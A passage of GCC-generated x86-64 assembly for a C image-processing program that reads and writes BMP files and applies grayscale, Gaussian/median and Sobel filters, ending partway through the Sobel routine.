.file "722312.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%c" .text .globl fprint_bit_unsigned_int .type fprint_bit_unsigned_int, @function fprint_bit_unsigned_int: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -4[rbp], 0 jmp .L2 .L3: mov eax, DWORD PTR -4[rbp] mov edx, 255 mov ecx, eax sal edx, cl mov eax, edx and eax, DWORD PTR -28[rbp] mov edx, eax mov eax, DWORD PTR -4[rbp] mov ecx, eax shr edx, cl mov rax, QWORD PTR -24[rbp] lea rsi, .LC0[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR -24[rbp] mov rdi, rax call fflush@PLT add DWORD PTR -4[rbp], 8 .L2: cmp DWORD PTR -4[rbp], 24 jle .L3 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size fprint_bit_unsigned_int, .-fprint_bit_unsigned_int .globl fprint_bit_unsigned_short .type fprint_bit_unsigned_short, @function fprint_bit_unsigned_short: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov eax, esi mov WORD PTR -12[rbp], ax movzx eax, WORD PTR -12[rbp] movzx eax, al mov rdx, QWORD PTR -8[rbp] mov rsi, rdx mov edi, eax call fputc@PLT mov rax, QWORD PTR -8[rbp] mov rdi, rax call fflush@PLT movzx eax, WORD PTR -12[rbp] shr ax, 8 movzx eax, ax mov rdx, QWORD PTR -8[rbp] mov rsi, rdx mov edi, eax call fputc@PLT mov rax, QWORD PTR -8[rbp] mov rdi, rax call fflush@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size fprint_bit_unsigned_short, .-fprint_bit_unsigned_short .globl skip_and_write .type skip_and_write, @function skip_and_write: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -36[rbp], edx mov DWORD PTR -4[rbp], 0 jmp .L6 .L7: mov rax, QWORD PTR -24[rbp] mov rdi, rax call fgetc@PLT mov edx, eax mov rax, QWORD PTR -32[rbp] mov rsi, rax mov edi, edx call fputc@PLT add DWORD PTR -4[rbp], 1 .L6: mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -36[rbp] jb .L7 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size skip_and_write, .-skip_and_write .globl fget_int .type fget_int, @function fget_int: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -16[rbp], 0 jmp .L9 .L10: mov rax, QWORD PTR -24[rbp] mov rdi, rax call fgetc@PLT mov edx, eax mov eax, DWORD PTR -16[rbp] cdqe mov BYTE PTR -12[rbp+rax], dl add DWORD PTR -16[rbp], 1 .L9: cmp DWORD PTR -16[rbp], 3 jle .L10 lea rax, -12[rbp] mov eax, DWORD PTR [rax] mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L12 call __stack_chk_fail@PLT .L12: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size fget_int, .-fget_int .section .rodata .LC1: .string "BM" .text .globl read_and_write_bmp .type read_and_write_bmp, @function read_and_write_bmp: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 80 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov QWORD PTR -56[rbp], rdx mov QWORD PTR -64[rbp], rcx mov QWORD PTR -72[rbp], r8 mov QWORD PTR -80[rbp], r9 mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT cmp eax, 66 je .L14 mov rax, QWORD PTR -40[rbp] mov rdi, rax call fclose@PLT mov rax, QWORD PTR -48[rbp] mov rdi, rax call fclose@PLT mov eax, 1 jmp .L15 .L14: mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT cmp eax, 77 je .L16 mov rax, QWORD PTR -40[rbp] mov rdi, rax call fclose@PLT mov rax, QWORD PTR -48[rbp] mov rdi, rax call fclose@PLT mov eax, 1 jmp .L15 .L16: mov rax, QWORD PTR -48[rbp] mov rcx, rax mov edx, 2 mov esi, 1 lea rdi, .LC1[rip] call fwrite@PLT mov rcx, QWORD PTR -48[rbp] mov rax, QWORD PTR -40[rbp] mov edx, 8 mov rsi, rcx mov rdi, rax call skip_and_write mov rax, QWORD PTR -40[rbp] mov rdi, rax call fget_int mov DWORD PTR -4[rbp], eax mov edx, DWORD PTR -4[rbp] mov rax, QWORD PTR -48[rbp] mov esi, edx mov rdi, rax call fprint_bit_unsigned_int mov rcx, QWORD PTR -48[rbp] mov rax, QWORD PTR -40[rbp] mov edx, 4 mov rsi, rcx mov rdi, rax call skip_and_write mov rax, QWORD PTR -40[rbp] mov rdi, rax call fget_int mov rdx, QWORD PTR -56[rbp] mov DWORD PTR [rdx], eax mov rax, QWORD PTR -56[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -48[rbp] mov esi, edx mov rdi, rax call fprint_bit_unsigned_int mov rax, QWORD PTR -40[rbp] mov rdi, rax call fget_int mov rdx, QWORD PTR -64[rbp] mov DWORD PTR [rdx], eax mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -48[rbp] mov esi, edx mov rdi, rax call fprint_bit_unsigned_int mov rcx, QWORD PTR -48[rbp] mov rax, QWORD PTR -40[rbp] mov edx, 2 mov rsi, rcx mov rdi, rax call skip_and_write mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT mov WORD PTR -22[rbp], ax mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT movzx eax, ax sal eax, 8 mov edx, eax movzx eax, WORD PTR -22[rbp] or eax, edx mov WORD PTR -22[rbp], ax movzx edx, WORD PTR -22[rbp] mov rax, QWORD PTR -48[rbp] mov esi, edx mov rdi, rax call fprint_bit_unsigned_short mov eax, DWORD PTR -4[rbp] lea edx, -30[rax] mov rcx, QWORD PTR -48[rbp] mov rax, QWORD PTR -40[rbp] mov rsi, rcx mov rdi, rax call skip_and_write cmp WORD PTR -22[rbp], 32 jne .L17 mov rax, QWORD PTR -56[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -64[rbp] mov eax, DWORD PTR [rax] imul eax, edx mov eax, eax mov rdi, rax call malloc@PLT mov rdx, rax mov rax, QWORD PTR -80[rbp] mov QWORD PTR [rax], rdx jmp .L18 .L17: mov rax, QWORD PTR -80[rbp] mov QWORD PTR [rax], 0 .L18: mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov edx, eax mov rax, QWORD PTR -64[rbp] mov eax, DWORD PTR [rax] mov eax, eax imul rdx, rax mov rax, rdx add rax, rax add rax, rdx mov rdi, rax call malloc@PLT mov rdx, rax mov rax, QWORD PTR -72[rbp] mov QWORD PTR [rax], rdx mov DWORD PTR -20[rbp], 0 jmp .L19 .L27: mov DWORD PTR -16[rbp], 0 jmp .L20 .L24: mov DWORD PTR -12[rbp], 2 jmp .L21 .L22: mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT mov ecx, eax mov rax, QWORD PTR -72[rbp] mov rsi, QWORD PTR [rax] mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] imul eax, DWORD PTR -20[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx lea rdx, [rsi+rax] mov eax, DWORD PTR -12[rbp] cdqe add rax, rdx mov edx, ecx mov BYTE PTR [rax], dl sub DWORD PTR -12[rbp], 1 .L21: cmp DWORD PTR -12[rbp], 0 jns .L22 cmp WORD PTR -22[rbp], 32 jne .L23 mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT mov edx, eax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] imul eax, DWORD PTR -20[rbp] mov ecx, eax mov eax, DWORD PTR -16[rbp] add eax, ecx mov eax, eax lea rcx, 0[0+rax*8] mov rax, QWORD PTR -80[rbp] add rax, rcx mov rax, QWORD PTR [rax] mov BYTE PTR [rax], dl .L23: add DWORD PTR -16[rbp], 1 .L20: mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] cmp DWORD PTR -16[rbp], eax jb .L24 mov DWORD PTR -8[rbp], 0 jmp .L25 .L26: mov rax, QWORD PTR -40[rbp] mov rdi, rax call fgetc@PLT add DWORD PTR -8[rbp], 1 .L25: mov rax, QWORD PTR -56[rbp] mov edx, DWORD PTR [rax] movzx eax, WORD PTR -22[rbp] shr ax, 3 movzx eax, ax imul eax, edx neg eax and eax, 3 cmp DWORD PTR -8[rbp], eax jb .L26 add DWORD PTR -20[rbp], 1 .L19: mov rax, QWORD PTR -64[rbp] mov eax, DWORD PTR [rax] cmp DWORD PTR -20[rbp], eax jb .L27 mov rax, QWORD PTR -40[rbp] mov rdi, rax call fclose@PLT mov eax, 0 .L15: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size read_and_write_bmp, .-read_and_write_bmp .globl use_mask .type use_mask, @function use_mask: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -40[rbp], rdi mov DWORD PTR -44[rbp], esi mov DWORD PTR -48[rbp], edx mov DWORD PTR -52[rbp], ecx mov DWORD PTR -56[rbp], r8d mov DWORD PTR -60[rbp], r9d movsd QWORD PTR -72[rbp], xmm0 mov eax, DWORD PTR 24[rbp] shr eax mov DWORD PTR -12[rbp], eax pxor xmm0, xmm0 movsd QWORD PTR -8[rbp], xmm0 mov eax, DWORD PTR -12[rbp] neg eax mov DWORD PTR -20[rbp], eax jmp .L29 .L34: mov eax, DWORD PTR -12[rbp] neg eax mov DWORD PTR -16[rbp], eax jmp .L30 .L33: mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -56[rbp] add eax, edx cmp DWORD PTR -48[rbp], eax jbe .L31 mov edx, DWORD PTR -16[rbp] mov eax, DWORD PTR -52[rbp] add eax, edx cmp DWORD PTR -44[rbp], eax jbe .L31 mov rax, QWORD PTR -40[rbp] mov rcx, QWORD PTR [rax] mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -56[rbp] add eax, edx imul eax, DWORD PTR -44[rbp] mov edx, eax mov eax, DWORD PTR -52[rbp] add rdx, rax mov eax, DWORD PTR -16[rbp] cdqe add rdx, rax mov rax, rdx add rax, rax add rax, rdx lea rdx, [rcx+rax] mov eax, DWORD PTR -60[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] movzx eax, al pxor xmm1, xmm1 cvtsi2sd xmm1, eax mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -12[rbp] add eax, edx imul eax, DWORD PTR 24[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add edx, eax mov eax, DWORD PTR -12[rbp] add eax, edx mov eax, eax lea rdx, 0[0+rax*8] mov rax, QWORD PTR 16[rbp] add rax, rdx movsd xmm0, QWORD PTR [rax] mulsd xmm0, xmm1 movsd xmm1, QWORD PTR -8[rbp] addsd xmm0, xmm1 movsd QWORD PTR -8[rbp], xmm0 jmp .L32 .L31: mov edx, DWORD PTR -20[rbp] mov eax, DWORD PTR -12[rbp] add eax, edx imul eax, DWORD PTR 24[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add edx, eax mov eax, DWORD PTR -12[rbp] add eax, edx mov eax, eax lea rdx, 0[0+rax*8] mov rax, QWORD PTR 16[rbp] add rax, rdx movsd xmm1, QWORD PTR [rax] movsd xmm0, QWORD PTR -72[rbp] subsd xmm0, xmm1 movsd QWORD PTR -72[rbp], xmm0 .L32: add DWORD PTR -16[rbp], 1 .L30: mov eax, DWORD PTR -16[rbp] cmp eax, DWORD PTR -12[rbp] jle .L33 add DWORD PTR -20[rbp], 1 .L29: mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -12[rbp] jle .L34 movsd xmm0, QWORD PTR -8[rbp] divsd xmm0, QWORD PTR -72[rbp] movq rax, xmm0 movq xmm0, rax pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size use_mask, .-use_mask .globl megas .type megas, @function megas: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 152 .cfi_offset 3, -24 mov eax, edi mov QWORD PTR -128[rbp], rsi mov DWORD PTR -120[rbp], edx mov DWORD PTR -132[rbp], ecx mov DWORD PTR -136[rbp], r8d movsd QWORD PTR -144[rbp], xmm0 mov BYTE PTR -116[rbp], al mov QWORD PTR -48[rbp], 0 mov QWORD PTR -40[rbp], 0 movsx eax, BYTE PTR -116[rbp] cmp eax, 103 je .L37 cmp eax, 109 jne .L71 mov eax, DWORD PTR -136[rbp] movsx rdx, eax mov eax, DWORD PTR -136[rbp] cdqe imul rax, rdx mov rdi, rax call malloc@PLT mov QWORD PTR -48[rbp], rax jmp .L39 .L37: mov eax, DWORD PTR -136[rbp] movsx rdx, eax mov eax, DWORD PTR -136[rbp] cdqe imul rax, rdx sal rax, 3 mov rdi, rax call malloc@PLT mov QWORD PTR -40[rbp], rax nop .L39: mov eax, DWORD PTR -136[rbp] mov edx, eax shr edx, 31 add eax, edx sar eax mov DWORD PTR -52[rbp], eax pxor xmm0, xmm0 movsd QWORD PTR -32[rbp], xmm0 mov edx, DWORD PTR -132[rbp] mov eax, DWORD PTR -120[rbp] imul rdx, rax mov rax, rdx add rax, rax add rax, rdx mov rdi, rax call malloc@PLT mov QWORD PTR -24[rbp], rax cmp BYTE PTR -116[rbp], 103 jne .L41 mov eax, DWORD PTR -52[rbp] neg eax mov DWORD PTR -100[rbp], eax jmp .L42 .L45: mov eax, DWORD PTR -52[rbp] neg eax mov DWORD PTR -96[rbp], eax jmp .L43 .L44: pxor xmm3, xmm3 cvtsi2sd xmm3, DWORD PTR -100[rbp] movq rax, xmm3 movsd xmm0, QWORD PTR .LC3[rip] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT movsd QWORD PTR -152[rbp], xmm0 pxor xmm4, xmm4 cvtsi2sd xmm4, DWORD PTR -96[rbp] movq rax, xmm4 movsd xmm0, QWORD PTR .LC3[rip] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT addsd xmm0, QWORD PTR -152[rbp] movq xmm1, QWORD PTR .LC4[rip] xorpd xmm0, xmm1 movsd QWORD PTR -152[rbp], xmm0 movsd xmm0, QWORD PTR .LC3[rip] mov rax, QWORD PTR -144[rbp] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT addsd xmm0, xmm0 movsd xmm2, QWORD PTR -152[rbp] divsd xmm2, xmm0 movq rax, xmm2 movq xmm0, rax call exp@PLT movq rbx, xmm0 movsd xmm0, QWORD PTR .LC3[rip] mov rax, QWORD PTR -144[rbp] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT movsd xmm1, QWORD PTR .LC5[rip] mulsd xmm1, xmm0 mov edx, DWORD PTR -100[rbp] mov eax, DWORD PTR -52[rbp] add eax, edx imul eax, DWORD PTR -136[rbp] mov edx, eax mov eax, DWORD PTR -96[rbp] add edx, eax mov eax, DWORD PTR -52[rbp] add eax, edx cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -40[rbp] add rax, rdx movq xmm0, rbx divsd xmm0, xmm1 movsd QWORD PTR [rax], xmm0 mov edx, DWORD PTR -100[rbp] mov eax, DWORD PTR -52[rbp] add eax, edx imul eax, DWORD PTR -136[rbp] mov edx, eax mov eax, DWORD PTR -96[rbp] add edx, eax mov eax, DWORD PTR -52[rbp] add eax, edx cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -40[rbp] add rax, rdx movsd xmm0, QWORD PTR [rax] movsd xmm1, QWORD PTR -32[rbp] addsd xmm0, xmm1 movsd QWORD PTR -32[rbp], xmm0 add DWORD PTR -96[rbp], 1 .L43: mov eax, DWORD PTR -96[rbp] cmp eax, DWORD PTR -52[rbp] jle .L44 add DWORD PTR -100[rbp], 1 .L42: mov eax, DWORD PTR -100[rbp] cmp eax, DWORD PTR -52[rbp] jle .L45 .L41: mov DWORD PTR -92[rbp], 0 jmp .L46 .L63: mov DWORD PTR -88[rbp], 0 jmp .L47 .L62: mov DWORD PTR -84[rbp], 0 jmp .L48 .L61: movsx eax, BYTE PTR -116[rbp] cmp eax, 103 je .L49 cmp eax, 109 jne .L50 mov DWORD PTR -104[rbp], 0 mov eax, DWORD PTR -52[rbp] neg eax mov DWORD PTR -80[rbp], eax jmp .L51 .L55: mov eax, DWORD PTR -52[rbp] neg eax mov DWORD PTR -76[rbp], eax jmp .L52 .L54: mov edx, DWORD PTR -92[rbp] mov eax, DWORD PTR -80[rbp] add eax, edx test eax, eax js .L53 mov edx, DWORD PTR -92[rbp] mov eax, DWORD PTR -80[rbp] add eax, edx cmp DWORD PTR -132[rbp], eax jbe .L53 mov edx, DWORD PTR -88[rbp] mov eax, DWORD PTR -76[rbp] add eax, edx test eax, eax js .L53 mov edx, DWORD PTR -88[rbp] mov eax, DWORD PTR -76[rbp] add eax, edx cmp DWORD PTR -120[rbp], eax jbe .L53 add DWORD PTR -104[rbp], 1 mov rax, QWORD PTR -128[rbp] mov rcx, QWORD PTR [rax] mov edx, DWORD PTR -92[rbp] mov eax, DWORD PTR -80[rbp] add eax, edx imul eax, DWORD PTR -120[rbp] mov edx, eax mov eax, DWORD PTR -88[rbp] cdqe add rdx, rax mov eax, DWORD PTR -76[rbp] cdqe add rdx, rax mov rax, rdx add rax, rax add rax, rdx lea rdx, [rcx+rax] mov eax, DWORD PTR -84[rbp] cdqe add rax, rdx mov edx, DWORD PTR -104[rbp] movsx rdx, edx lea rcx, -1[rdx] mov rdx, QWORD PTR -48[rbp] add rdx, rcx movzx eax, BYTE PTR [rax] mov BYTE PTR [rdx], al .L53: add DWORD PTR -76[rbp], 1 .L52: mov eax, DWORD PTR -76[rbp] cmp eax, DWORD PTR -52[rbp] jle .L54 add DWORD PTR -80[rbp], 1 .L51: mov eax, DWORD PTR -80[rbp] cmp eax, DWORD PTR -52[rbp] jle .L55 mov DWORD PTR -72[rbp], 0 jmp .L56 .L60: mov edx, DWORD PTR -72[rbp] mov rax, QWORD PTR -48[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -107[rbp], al mov eax, DWORD PTR -72[rbp] mov WORD PTR -106[rbp], ax mov eax, DWORD PTR -72[rbp] mov DWORD PTR -68[rbp], eax jmp .L57 .L59: mov eax, DWORD PTR -68[rbp] movsx rdx, eax mov rax, QWORD PTR -48[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp BYTE PTR -107[rbp], al jbe .L58 mov eax, DWORD PTR -68[rbp] movsx rdx, eax mov rax, QWORD PTR -48[rbp] add rax, rdx movzx eax, BYTE PTR [rax] mov BYTE PTR -107[rbp], al mov eax, DWORD PTR -68[rbp] mov WORD PTR -106[rbp], ax .L58: add DWORD PTR -68[rbp], 1 .L57: mov eax, DWORD PTR -68[rbp] cmp eax, DWORD PTR -104[rbp] jl .L59 mov edx, DWORD PTR -72[rbp] mov rax, QWORD PTR -48[rbp] add rax, rdx movsx rcx, WORD PTR -106[rbp] mov rdx, QWORD PTR -48[rbp] add rdx, rcx movzx eax, BYTE PTR [rax] mov BYTE PTR [rdx], al mov edx, DWORD PTR -72[rbp] mov rax, QWORD PTR -48[rbp] add rdx, rax movzx eax, BYTE PTR -107[rbp] mov BYTE PTR [rdx], al add DWORD PTR -72[rbp], 1 .L56: mov eax, DWORD PTR -104[rbp] cmp DWORD PTR -72[rbp], eax jb .L60 mov eax, DWORD PTR -104[rbp] mov edx, eax shr edx, 31 add eax, edx sar eax movsx rdx, eax mov rax, QWORD PTR -48[rbp] add rdx, rax mov eax, DWORD PTR -92[rbp] imul eax, DWORD PTR -120[rbp] mov ecx, eax mov eax, DWORD PTR -88[rbp] add eax, ecx mov ecx, eax mov rax, rcx add rax, rax add rcx, rax mov rax, QWORD PTR -24[rbp] add rcx, rax movzx edx, BYTE PTR [rdx] mov eax, DWORD PTR -84[rbp] cdqe mov BYTE PTR [rcx+rax], dl jmp .L50 .L49: mov r8d, DWORD PTR -136[rbp] mov r10d, DWORD PTR -92[rbp] mov ecx, DWORD PTR -88[rbp] mov rdi, QWORD PTR -32[rbp] mov r9d, DWORD PTR -84[rbp] mov edx, DWORD PTR -132[rbp] mov esi, DWORD PTR -120[rbp] mov rax, QWORD PTR -128[rbp] push r8 push QWORD PTR -40[rbp] movq xmm0, rdi mov r8d, r10d mov rdi, rax call use_mask add rsp, 16 mov eax, DWORD PTR -92[rbp] imul eax, DWORD PTR -120[rbp] mov edx, eax mov eax, DWORD PTR -88[rbp] add eax, edx mov edx, eax mov rax, rdx add rax, rax add rdx, rax mov rax, QWORD PTR -24[rbp] add rdx, rax cvttsd2si eax, xmm0 mov ecx, eax mov eax, DWORD PTR -84[rbp] cdqe mov BYTE PTR [rdx+rax], cl nop .L50: add DWORD PTR -84[rbp], 1 .L48: cmp DWORD PTR -84[rbp], 2 jle .L61 add DWORD PTR -88[rbp], 1 .L47: mov eax, DWORD PTR -88[rbp] cmp DWORD PTR -120[rbp], eax ja .L62 add DWORD PTR -92[rbp], 1 .L46: mov eax, DWORD PTR -92[rbp] cmp DWORD PTR -132[rbp], eax ja .L63 mov DWORD PTR -64[rbp], 0 jmp .L64 .L69: mov DWORD PTR -60[rbp], 0 jmp .L65 .L68: mov DWORD PTR -56[rbp], 0 jmp .L66 .L67: mov eax, DWORD PTR -64[rbp] imul eax, DWORD PTR -120[rbp] mov edx, eax mov eax, DWORD PTR -60[rbp] add eax, edx mov edx, eax mov rax, rdx add rax, rax add rdx, rax mov rax, QWORD PTR -24[rbp] lea rcx, [rdx+rax] mov rax, QWORD PTR -128[rbp] mov rsi, QWORD PTR [rax] mov eax, DWORD PTR -64[rbp] imul eax, DWORD PTR -120[rbp] mov edx, eax mov eax, DWORD PTR -60[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx lea rdx, [rsi+rax] mov eax, DWORD PTR -56[rbp] cdqe add rdx, rax mov eax, DWORD PTR -56[rbp] cdqe movzx eax, BYTE PTR [rcx+rax] mov BYTE PTR [rdx], al add DWORD PTR -56[rbp], 1 .L66: cmp DWORD PTR -56[rbp], 2 jle .L67 add DWORD PTR -60[rbp], 1 .L65: mov eax, DWORD PTR -60[rbp] cmp eax, DWORD PTR -120[rbp] jb .L68 add DWORD PTR -64[rbp], 1 .L64: mov eax, DWORD PTR -64[rbp] cmp eax, DWORD PTR -132[rbp] jb .L69 mov rax, QWORD PTR -24[rbp] mov rdi, rax call free@PLT movsx eax, BYTE PTR -116[rbp] cmp eax, 103 je .L70 cmp eax, 109 jne .L36 mov rax, QWORD PTR -48[rbp] mov rdi, rax call free@PLT jmp .L36 .L70: mov rax, QWORD PTR -40[rbp] mov rdi, rax call free@PLT jmp .L36 .L71: nop .L36: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size megas, .-megas .globl shade .type shade, @function shade: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -40[rbp], rdi mov DWORD PTR -44[rbp], esi mov DWORD PTR -48[rbp], edx mov DWORD PTR -20[rbp], 0 jmp .L73 .L78: mov DWORD PTR -16[rbp], 0 jmp .L74 .L77: mov rax, QWORD PTR -40[rbp] mov rcx, QWORD PTR [rax] mov eax, DWORD PTR -20[rbp] imul eax, DWORD PTR -44[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx add rax, rcx movzx eax, BYTE PTR [rax] movzx eax, al pxor xmm1, xmm1 cvtsi2sd xmm1, eax movsd xmm0, QWORD PTR .LC6[rip] mulsd xmm1, xmm0 mov rax, QWORD PTR -40[rbp] mov rcx, QWORD PTR [rax] mov eax, DWORD PTR -20[rbp] imul eax, DWORD PTR -44[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx add rax, rcx add rax, 1 movzx eax, BYTE PTR [rax] movzx eax, al pxor xmm2, xmm2 cvtsi2sd xmm2, eax movsd xmm0, QWORD PTR .LC7[rip] mulsd xmm0, xmm2 addsd xmm1, xmm0 mov rax, QWORD PTR -40[rbp] mov rcx, QWORD PTR [rax] mov eax, DWORD PTR -20[rbp] imul eax, DWORD PTR -44[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx add rax, rcx add rax, 2 movzx eax, BYTE PTR [rax] movzx eax, al pxor xmm2, xmm2 cvtsi2sd xmm2, eax movsd xmm0, QWORD PTR .LC8[rip] mulsd xmm0, xmm2 addsd xmm0, xmm1 movsd QWORD PTR -8[rbp], xmm0 mov DWORD PTR -12[rbp], 0 jmp .L75 .L76: mov rax, QWORD PTR -40[rbp] mov rcx, QWORD PTR [rax] mov eax, DWORD PTR -20[rbp] imul eax, DWORD PTR -44[rbp] mov edx, eax mov eax, DWORD PTR -16[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx lea rdx, [rcx+rax] mov eax, DWORD PTR -12[rbp] cdqe add rax, rdx cvttsd2si edx, QWORD PTR -8[rbp] mov BYTE PTR [rax], dl add DWORD PTR -12[rbp], 1 .L75: cmp DWORD PTR -12[rbp], 2 jle .L76 add DWORD PTR -16[rbp], 1 .L74: mov eax, DWORD PTR -16[rbp] cmp eax, DWORD PTR -44[rbp] jb .L77 add DWORD PTR -20[rbp], 1 .L73: mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -48[rbp] jb .L78 nop nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size shade, .-shade .globl sobel_xy .type sobel_xy, @function sobel_xy: .LFB14: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 288 mov eax, edi mov QWORD PTR -272[rbp], rsi mov DWORD PTR -264[rbp], edx mov DWORD PTR -276[rbp], ecx movsd QWORD PTR -288[rbp], xmm0 mov BYTE PTR -260[rbp], al mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov edx, DWORD PTR -276[rbp] mov eax, DWORD PTR -264[rbp] imul rdx, rax mov rax, rdx add rax, rax add rax, rdx mov rdi, rax call malloc@PLT mov QWORD PTR -200[rbp], rax movsd xmm0, QWORD PTR .LC9[rip] movsd QWORD PTR -160[rbp], xmm0 movsd xmm0, QWORD PTR .LC3[rip] movsd QWORD PTR -152[rbp], xmm0 movsd xmm0, QWORD PTR .LC9[rip] movsd QWORD PTR -144[rbp], xmm0 pxor xmm0, xmm0 movsd QWORD PTR -136[rbp], xmm0 pxor xmm0, xmm0 movsd QWORD PTR -128[rbp], xmm0 pxor xmm0, xmm0 movsd QWORD PTR -120[rbp], xmm0 movsd xmm0, QWORD PTR .LC10[rip] movsd QWORD PTR -112[rbp], xmm0 movsd xmm0, QWORD PTR .LC11[rip] movsd QWORD PTR -104[rbp], xmm0 movsd xmm0, QWORD PTR .LC10[rip] movsd QWORD PTR -96[rbp], xmm0 movsd xmm0, QWORD PTR .LC10[rip] movsd QWORD PTR -80[rbp], xmm0 pxor xmm0, xmm0 movsd QWORD PTR -72[rbp], xmm0 movsd xmm0, QWORD PTR .LC9[rip] movsd QWORD PTR -64[rbp], xmm0 movsd xmm0, QWORD PTR .LC11[rip] movsd QWORD PTR -56[rbp], xmm0 pxor xmm0, xmm0 movsd QWORD PTR -48[rbp], xmm0 movsd xmm0, QWORD PTR .LC3[rip] movsd QWORD PTR -40[rbp], xmm0 movsd xmm0, QWORD PTR .LC10[rip] movsd QWORD PTR -32[rbp], xmm0 pxor xmm0, xmm0 movsd QWORD PTR -24[rbp], xmm0 movsd xmm0, QWORD PTR .LC9[rip] movsd QWORD PTR -16[rbp], xmm0 movsd xmm0, QWORD PTR .LC6[rip] movsd QWORD PTR -192[rbp], xmm0 movsd xmm0, QWORD PTR .LC7[rip] movsd QWORD PTR -184[rbp], xmm0 movsd xmm0, QWORD PTR .LC8[rip] movsd QWORD PTR -176[rbp], xmm0 mov DWORD PTR -252[rbp], 0 jmp .L80 .L95: mov DWORD PTR -248[rbp], 0 jmp .L81 .L94: pxor xmm0, xmm0 movsd QWORD PTR -208[rbp], xmm0 mov DWORD PTR -244[rbp], 0 jmp .L82 .L88: cmp DWORD PTR -252[rbp], 0 je .L83 mov eax, DWORD PTR -276[rbp] sub eax, 1 cmp DWORD PTR -252[rbp], eax jnb .L83 cmp DWORD PTR -248[rbp], 0 je .L83 mov eax, DWORD PTR -264[rbp] sub eax, 1 cmp DWORD PTR -248[rbp], eax jnb .L83 cmp BYTE PTR -260[rbp], 121 